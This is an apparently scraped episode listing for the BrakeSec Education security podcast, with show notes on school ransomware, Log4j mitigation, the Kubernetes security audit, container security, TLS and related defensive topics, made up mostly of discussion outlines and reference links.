BrakeSec Education Podcast (Bryan Brake, Amanda Berlin, and Brian Boettcher)
Explorez tous les épisodes de BrakeSec Education Podcast
| Date | Titre | Durée | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 29 Mar 2020 | 2020-012-April Mardock, Nathan McNulty, Jared Folkins, school security, ransomware attacks | 00:48:22 | |||||||||||||||||||||||||||||||
April Mardock - CISO - Seattle Public Schools Jared Folkins - IT Engineer - Bend La Pine Schools Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/ Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security persons at education institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets? Is money/budget the reason schools get the raw deal here? Why is ransomware such an appealing attack?
How complex is the school environment?
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines?
Localadmins are not granted… (excellent!)
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 01 Jun 2024 | Tanya Janca Talks secure coding, Semgrep Academy, and community building, and more! | 01:27:18 | |||||||||||||||||||||||||||||||
Check out the BrakeSecEd Twitch at https://twitch.tv/brakesec Join the Discord! https://discord.gg/brakesec #youtube VOD (in 1440p): https://www.youtube.com/watch?v=axQWGyd79NM Questions and topics: Additional information / pertinent LInks (Would you like to know more?):
| |||||||||||||||||||||||||||||||||
| 03 Jan 2016 | 2016-001: Jay Schulmann explains how to use BSIMM in your environment | 01:02:17 | |||||||||||||||||||||||||||||||
#Jay #Schulman is a consultant with 15+ years of experience in helping organizations implementing #BSIMM and other compliance frameworks. For our first #podcast of 2016, we invited him on to further discuss and how he has found is the best way to implement it into a company's #security #program.
Jay Schulman's #website: https://www.jayschulman.com/ Jay's Podcast "Building a Life and Career in Security" (iTunes): https://itunes.apple.com/us/podcast/building-life-career-in-security/id994550360?mt=2&ls=1 Jay's Twitter: https://twitter.com/jschulman
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Bryan's Twitter: http://www.twitter.com/bryanbrake Brian's Twitter: http://www.twitter.com/boettcherpwned Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com iTunes Link: https://itunes.apple.com/us/podcast/2016-001-jay-schulmann-explains/id799131292?i=360028388&mt=2 Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-001-JaySchulman-BSIMM.mp3 | |||||||||||||||||||||||||||||||||
| 23 Dec 2021 | 2021-046-Mick Douglas, Log4j vulnerabilities, egress mitigations- part2 | 00:40:47 | |||||||||||||||||||||||||||||||
Introduction Overview of Log4j vuln (as of 16 December 2021) Why is it a big deal? (impact/criticality/risk) Talk about patching vs. mitigation why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java? Good callout is building slides to brief org leadership, detections, and other educational tools. Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue) Are there other technologies like log4j that prop up the entire world, and we just don’t know? Egress traffic (discussed at length on twitter, what problems it solve?) https://twitter.com/mubix/status/1470430085169745920 Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - apache removed JDNI functionality https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 -list of advisories for log4j Mitigation: https://twitter.com/brunoborges/status/1469186875608875011 2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable https://bugzilla.redhat.com/show_bug.cgi?id=1639834 OpenJDK… https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string... Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 The #Log4Shell attack vector was known since 2016… Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA. I = Isolate M = Minimize M = Monitor A = Active Defense https://github.com/MarkBaggett/srum-dump “SRUM Dump extracts information from the System Resource Utilization Management Database and creates a Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.”
| |||||||||||||||||||||||||||||||||
| 15 Mar 2015 | 2015-012-Fill In podcast with Jarrod and Lee! | 01:43:36 | |||||||||||||||||||||||||||||||
Mr. Boettcher went on vacation and was volunteering for Austin Bsides this week, and I needed to do a podcast, so I enlisted the aid of Lee Brotherston and Jarrod Frates discuss some important topics. We discuss the seemingly short talent pool for IT/IS positions. We talk about the ROWHAMMER vulnerability and how it may affect your organization. Additionally, we talk about how the NTP protocol is being maintained by one person and what can be done to help with that, as it is a critical piece of Internet Infrastructure, and finally, we figure out why PGP/GPG is not user-friendly, and if there are ways to make it better, or if it needs to be replaced permanently.
News of the week
http://www.darknet.org.uk/2015/03/rowhammer-ddr3-exploit-what-you-need-to-know/
http://www.informationweek.com/it-life/ntps-fate-hinges-on-father-time/d/d-id/1319432
| |||||||||||||||||||||||||||||||||
| 28 Sep 2016 | 2016-038-Derbycon Audio and 2nd Annual Podcast with Podcasters! | 01:24:14 | |||||||||||||||||||||||||||||||
Mr. Brian Boettcher and I had a great time at DerbyCon. We met so many people and it really was excellent meeting all the fans who came up and said "Hello" or that they really enjoyed the #podcast. It is truly a labor of love and something that we hope everyone can learn something from. We got some audio while at lunch at #Gordon #Biersch talking about log monitoring inspired by @dualcore's talk on #Anti-Forensics talk (http://www.irongeek.com/i.php?page=videos/derbycon6/310-anti-forensics-af-int0x80-of-dual-core) and how to evade log monitoring with Mr. Brian Boettcher and Michael Gough. (shout-out to @mattifestation, @dualcore, @baywolf88, @carlos_perez) We sat down with Mr. Osman (@surkatty) from the Sound Security Podcast (@SoundSec), who was a first time attendee to #DerbyCon. We get his thoughts about DerbyCon and what talks he enjoyed. Finally, our 2nd Annual podcast with our fellow podcasters was on. We had it in Bill Gardner's room (ReBoot-It podcast) (@oncee), Amanda Berlin (@infosystir) from #Hurricane #Labs Podcast, Jerry Bell (@MaliciousLink) from #Defensive #Security Podcast, Ben Heise (@benheise) from Rally #Security Podcast, Tim DeBlock (@TimothyDeBlock) from Exploring Information Security Podcast, and SciaticNerd (@sciaticnerd) from Security Endeavors podcast IronGeek's website has all the videos available to listen to here: http://www.irongeek.com/i.php?page=videos/derbycon6/mainlist
Whiskey Bent Valley Boys: http://whiskeybentvalley.tumblr.com/ or iTunes: https://itunes.apple.com/us/artist/whiskey-bent-valley-boys/id318874442
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-038-Derbycon_podcast.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-038-derbycon-audio-2nd/id799131292?i=1000375934157&mt=2 YouTube: https://www.youtube.com/watch?v=W7ylsfwGyhc
#SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
| |||||||||||||||||||||||||||||||||
| 12 Jan 2022 | OSS sustainability, log4j fallout, developer damages own code-p1 | 00:43:47 | |||||||||||||||||||||||||||||||
Adam Baldwin (@adam_baldwin) Amélie Koran (@webjedi)
Log4j vulnerability
https://logging.apache.org/log4j/2.x/license.html https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/ https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS. https://twitter.com/BleepinComputer/status/1480182019854327808
Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data Colors.js - https://www.npmjs.com/pafaker - npmckage/colors get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/
Should OSS teams expect payment for giving their time/code away for free? What are their expectations
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, “Hobbyists” were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this)
| |||||||||||||||||||||||||||||||||
| 03 May 2015 | 2015-020 - Deadly Programming Sins - Buffer Underruns | 00:38:05 | |||||||||||||||||||||||||||||||
Code Audits are a necessary evil. Many organizations resort to using automated tools, but tools may not find all issues with code. Sometimes, you need to take a look at the code yourself. Mr. Boettcher and I begin going through the book "24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them" What we covered this week is "buffer overruns", we discuss what they are, and how they occur. Get ready for a crash course in code audits. The book is not required, but it definitely helps when we are discussing concepts. We also mentioned our new Patreon account, so if you are a listener, and want to support what we do, you can give on a per month schedule. Donations are entirely optional, and if you don't wish to give, that's fine too.
24 Deadly Sins on Amazon:
| |||||||||||||||||||||||||||||||||
| 29 Apr 2018 | 2018-014- Container Security with Jay Beale | 01:05:30 | |||||||||||||||||||||||||||||||
Container security
Jay Beale @inguardians , @jaybeale
Containers
Difference between containers and sandboxing
Roll your own - Containers Using public registries - leave you vulnerable Use your own private repos for deploying containers
Reduce attack surface Reduce user access
Automation will allow more security to get baked in.
https://www.infoworld.com/article/3104030/security/5-keys-to-docker-container-security.html
https://blog.blackducksoftware.com/8-takeaways-nist-application-container-security-guide
https://www.vagrantup.com/downloads.html
https://www.vmware.com/products/thinapp.html
https://www.meetup.com/SEASec-East/events/249983387/
S3 buckets / Azure Blobs
https://docs.microsoft.com/en-us/azure/architecture/aws-professional/services
https://docs.aws.amazon.com/config/latest/developerguide/s3-bucket-policy.html
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 10 Dec 2015 | 2015-051-MITRE's ATT&CK Matrix | 00:48:23 | |||||||||||||||||||||||||||||||
#MITRE has a Matrix that classifies the various ways that your network can be compromised. It shows all the post-exploitation categories from 'Persistence' to 'Privilege Escalation'. It's a nice way to organize all the information. This week, Mr. Boettcher and I go over "#Persistence" and "#Command and #Control" sections of the Matrix. Every person who attacks you has a specific method that they use to get and keep access to your systems, it's as unique as a fingerprint. Threat intelligence companies call it TTP (#Tactics, #Techniques, and #Procedures), we also discuss the Cyber #KillChain, and where it came from. #ATT&CK Matrix: https://attack.mitre.org/wiki/Main_Page Tactics, Techniques, and Procedures (shows patterns of behavior) https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf -- Cyber Kill Chain paper that inspired the ATT&CK Matrix Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-051-ATTACK_Matrix.mp3 iTunes: https://itunes.apple.com/us/podcast/2015-051-mitres-att-ck-matrix/id799131292?i=358670845&mt=2 TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com | |||||||||||||||||||||||||||||||||
| 20 Jun 2018 | 2018-021-TLS 1.3 discussion, Area41 report, wireshark goodness | 00:42:43 | |||||||||||||||||||||||||||||||
Area41 Zurich report Book Club - 4th Tuesday of the month https://www.owasp.org/images/d/d3/TLS_v1.3_Overview_OWASP_Final.pdf
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet TLS_DHE_RSA_AES_256_GCM_SHA256
TLS = Protocol DHE = Diffie-Hellman ephemeral (provides Perfect Forward Secrecy) Perfect Forward Secrecy = session keys won’t be compromised, even if server private keys are Past messages and data cannot be retrieved or decrypted (https://en.wikipedia.org/wiki/Forward_secrecy)
RSA = Digital Signature (authentication) There are only 2 (RSA, or ECDSA)
AES_256_GCM - HMAC (hashed message authentication code)
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet https://en.wikipedia.org/wiki/HMAC#Definition_.28from_RFC_2104.29
https://en.wikipedia.org/wiki/Funicular
https://mozilla.github.io/server-side-tls/ssl-config-generator/?hsts=no
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 10 Oct 2015 | Derbycon Audio - post-Derby interviews! | 01:04:10 | |||||||||||||||||||||||||||||||
In our last bit of Derbycon audio, I discussed DerbyCon experiences with Mr. Boettcher, Magen Wu (@tottenkoph), Haydn Johnson (@haydnjohnson), and Ganesh Ramakrishnan (@hyperrphysics). We find out what they liked, what they didn't like, and you get a lot of great information about packing for a con, things you can do to improve your convention going experience. Hopefully, you'll hear the amount of fun we had, and find the time to go to a convention. There are literally hundreds, many only few hours by plane away. Some can be found in your own town or within driving distance. | |||||||||||||||||||||||||||||||||
| 31 Aug 2019 | 2019-032-kubernetes security audit dicussion with Jay Beale and Aaron Small | 00:47:13 | |||||||||||||||||||||||||||||||
Topics: Derbycon Pizza Party (with podcast show!) https://www.eventbrite.com/e/brakesec-pizza-party-at-the-derbycon-mental-health-village-tickets-69219271705 Mental health village at Derbycon
Jay Beale (co-lead for audit) *Bust-a-Kube* Aaron Small (product mgr at GKE/Google) Atreides Partners Trail of Bits
What was the Audit? How did it come about?
Who were the players? Kubernetes Working Group Aaron, Craig, Jay, Joel Outside vendors: Atredis: Josh, Nathan Keltner Trail of Bits: Stefan Edwards, Bobby Tonic , Dominik Kubernetes Project Leads/Devs Interviewed devs -- this was much of the info that went into the threat model Rapid Risk Assessments - let’s put the GitHub repository in the show notes
What did it produce? Vuln Report Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf White Papers https://github.com/kubernetes/community/tree/master/wg-security-audit/findings
Discuss the results: Threat model findings Controls silently fail, leading to a false sense of security Pod Security Policies, Egress Network Rules Audit model isn’t strong enough for non-repudiation By default, API server doesn’t log user movements through system TLS Encryption weaknesses Most components accept cleartext HTTP Boot strapping to add Kubelets is particularly weak Multiple components do not check certificates and/or use self-signed certs HTTPS isn’t enforced Certificates are long-lived, with no revocation capability Etcd doesn’t authenticate connections by default Controllers all Bundled together Confused Deputy: b/c lower priv controllers bundled in same binary as higher Secrets not encrypted at rest by default Etcd doesn’t have signatures on its write-ahead log DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes
Port 10255 has an unauthenticated HTTP server for status and health checking Vulns / Findings (not complete list, but interesting) Hostpath pod security policy bypass via persistent volumes TOCTOU when moving PID to manager’s group Improperly patched directory traversal in kubectl cp Bearer tokens revealed in logs Lots of MitM risk: SSH not checking fingerprints: InsecureIgnoreHostKey gRPC transport seems all set to WithInsecure() HTTPS connections not checking certs Some HTTPS connections are unauthenticated Output encoding on JSON construction This might lead to further work, as JSON can get written to logs that may be consumed elsewhere. Non-constant time check on passwords Lack of re-use / library-ification of code
Who will use these findings and how? Devs, google, bad guys? Any new audit tools created from this?
Brad geesaman “Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec https://www.youtube.com/watch?v=vTgQLzeBfRU
Aaron Small: https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster
CNCF: https://www.youtube.com/watch?v=90kZRyPcRZw
Findings:
Scope for testing: Source code review (what languages did they have to review?) Golang, shell, ...
Networking (discuss the networking *internal* *external* Cryptography (TLS, data stores) AuthN/AuthZ RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*) Secrets Namespace traversals Namespace claims
Methodology: Setup a bunch of environments? Primarily set up a single environment IIRC Combination of code audit and active ?fuzzing? What does one fuzz on a K8s environment? Tested with latest alpha or production versions? Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing. Tested mulitple different types of k8s implementations? Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray) Bug Bounty program: https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 04 Mar 2014 | Episode 7, Part 1 - Kevin Johnson of SecureIdeas! | 00:38:23 | |||||||||||||||||||||||||||||||
During our SEC542, GIAC Web App Pentesting course, we got the pleasure and honor of sitting down with Kevin Johnson from SecureIdeas on who he is, how Samurai WTF came into being, and why we should be doing licensing for proper ethcial hackers.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 01 Jun 2014 | It all goes in "the cloud" (Part 1) | 00:36:24 | |||||||||||||||||||||||||||||||
Brian and I interviewed Mr. Guillaume Ross (@gepeto42), an Information Security professional who helps organizations get themselves situated into cloud based solutions. We get a better understanding of why people would want to put their info into the 'cloud' and how they are different than traditional co-lo and datacenters.
Guillaume's Blog: http://blog.binaryfactory.ca/
AWS (amazon) Security Best Practices WhitePaper: http://aws.amazon.com/whitepapers/aws-security-best-practices/ Amazon EC2 FAQ: http://aws.amazon.com/ec2/faqs/ Microsoft's Azure FAQ:http://azure.microsoft.com/en-us/support/faq/?rnd=1
"cloud computing icon" courtesy of smartdatacollective.com
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 16 Sep 2021 | SPONSOR: Blumira's Patrick Garrity | 00:48:10 | |||||||||||||||||||||||||||||||
Blumira- Per crunchbase: Contact sales@blumira.com
Patrick Garrity, VP of Operations. Patrick has years of experience in the security industry building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security. Twitter = @Thisisnottap
https://www.ibm.com/cloud/blog/top-5-advantages-of-software-as-a-service https://www.outsource2india.com/software/articles/software-as-a-service.asp
5 Advantages of SaaS Reduced time to benefit. Software as a service (SaaS) differs from the traditional model because the software (application) is already installed and configured. ... Lower costs. ... Scalability and integration. ... New releases (upgrades) ... Easy to use and perform proof-of-concepts.
5 Disadvantages of SaaS Insufficient Data Security. SaaS-based application model. Difficulty with Regulations Compliance. Cumbersome Data Mobility. Low Performance. Troublesome Software Integration.
Limit Attack Surface https://www.wallix.com/blog/top-10-ways-to-limit-attack-surface https://www.okta.com/identity-101/what-is-an-attack-surface/ https://securityscorecard.com/blog/what-is-cyber-attack-surface-management
| |||||||||||||||||||||||||||||||||
| 07 Feb 2015 | 2015-006- Is your ISP doing a 'man-in-the-middle' on you? | 00:59:29 | |||||||||||||||||||||||||||||||
During our research with Lee Brotherston, who we had on last week for our podcast on threat modeling, we got to listen to one of his talks about how his ISP in Canada was actively doing a Man-in-Middle injection of a banner into sites that he visited.
We were intrigued, and also gobsmacked (I can say that, right?) about the brashness of an ISP not apparently understanding the security implications of this, so we had him back on totalk about the finer points of his research. The bad news? Other ISPs, including American ISPs are using this technology.
This is one of those podcasts that you need to tell your friends about, cause it's truly surprising the lengths ISPs go to injecting content into your pages. We also have a short message about the Bsides Las Vegas Proving Grounds this year... If you've wanted to present a paper at a conference, and have a mentor guide you through the process, hit them up on the Proving Grounds page at http://www.bsideslv.com Show notes (lots of info): https://docs.google.com/document/d/1YLkiRE1SVIyWquWc-iQrESWlT10rSJmW1VcrOX3kQZ0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 16 Jun 2014 | OWASP Top Ten: Numbers 6 - 10 | 00:45:18 | |||||||||||||||||||||||||||||||
As we wade through the morass of the Infosec swamp, we come across the OWASP 2013 report of web app vulnerabilities. Since Mr. Boettcher and I find ourselves often attempting to explain these kinds of issues to people on the Internet and in our daily lives, we thought it would be prudent to help shed some light on these. So this week, we discuss the lower of the top 10, the ones that aren't as glamorous or as earth shaking as XSS or SQLI, but are gotchas that will bite thine ass just as hard. Next week is the big ones, the Top 5... all your favorites, in one place!
OWASP Top 10 (2013) PDF: http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf Costs of finding web defects early (2008): http://www.informit.com/articles/article.aspx?p=1193473&seqNum=6
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
| |||||||||||||||||||||||||||||||||
| 08 Nov 2017 | 2017-037 - Asset management techniques, and it's importance, DDE malware | 00:52:29 | |||||||||||||||||||||||||||||||
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-037-asset_management.mp3 We started off the show talking to Mr. Boettcher about what DDE is and how malware is using this super legacy Windows component (found in Windows 2) to propogate malware in MS Office docs and spreadsheets. We also talk about how to protect your Windows users from this. We then get into discussing why it's so important to have proper asset management in place. Without knowing what is in your environment, you could suffer gaps in coverage of your anti-virus/EDR software, unable to patch systems properly and even make it easier for lateral movement. Finally, we discuss our recent "Introduction to Reverse Engineering" course with Tyler Hudak (@secshoggoth), and Ms. Berlin's upcoming trip to New Zealand. RSS: http://www.brakeingsecurity.com/rss Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.slack.com/join/shared_invite/enQtMjY2NDAyMzgxNjAwLWFjZTc1YzVlYWExM2U5ZjhiNDYwZTIzN2UxNjM1OWIwYzBkMjgzYmY4ZjA2MzViNzQ2ZTUzMGQ2YWYwYWY3NTM or DM us on Twitter, or email us. #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ SHOW NOTES:
Oreilly con report Malware report from Mr. Boettcher DDE (Dynamic Data Exchange), all the rage https://en.wikipedia.org/wiki/Windows_2.0 http://home.bt.com/tech-gadgets/computing/10-facts-about-windows-2-11364027546216 https://www.ghacks.net/2017/10/23/disable-office-ddeauto-to-mitigate-attacks/
Why asset management? Know what’s in your environment CIS Top 20...no wait, it’s the TOP THREE of the 20. It all builds on this… Know what’s in your environment https://metacpan.org/pod/App::Netdisco <- NetDisco (great for network equipment)
Where do you store that data? Or is it just enough to know where to get it? Systems you can pull asset data from: Patching systems Chef WSUS FIM systems Tripwire DLP systems Vuln Scanners AV/EDR management router/switch tables DNS Asset management systems are a gold mine for an attacker Names IPs email addresses
Coverage gaps in these systems will cause you to lose asset visibility
http://www.businessinsider.com/programmer-automates-his-job-2015-11 | |||||||||||||||||||||||||||||||||
| 24 Jan 2023 | Layoff discussions, another TMO breach, OneNote Malware, and more! | 01:23:04 | |||||||||||||||||||||||||||||||
Full youtube video: https://www.youtube.com/watch?v=1Dgq8FpnWPw
| |||||||||||||||||||||||||||||||||
| 21 Jan 2017 | 2017-002: Threat Lists, IDS/IPS rules, and mentoring | 01:05:41 | |||||||||||||||||||||||||||||||
